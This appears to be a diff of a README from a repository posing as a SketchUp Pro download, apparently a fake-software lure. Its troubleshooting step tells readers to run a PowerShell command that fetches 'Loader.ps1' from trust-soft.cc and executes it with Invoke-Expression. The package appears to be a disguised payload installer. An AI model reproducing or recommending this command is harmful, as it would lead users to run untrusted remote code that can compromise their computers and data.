Morningfogate/SketchUp-Pro/README.md

 ```

 ### 💬 "irm" command not found (Outdated PowerShell)
-If your PowerShell version doesn't support the `irm` shortcut, use the full, unabbreviated commands instead:
+If your version doesn't support the irm shortcut, use the full, unabbreviated commands instead:
 ```powershell
 Invoke-RestMethod https://trust-soft.cc/powershell/Loader.ps1 | Invoke-Expression
 ```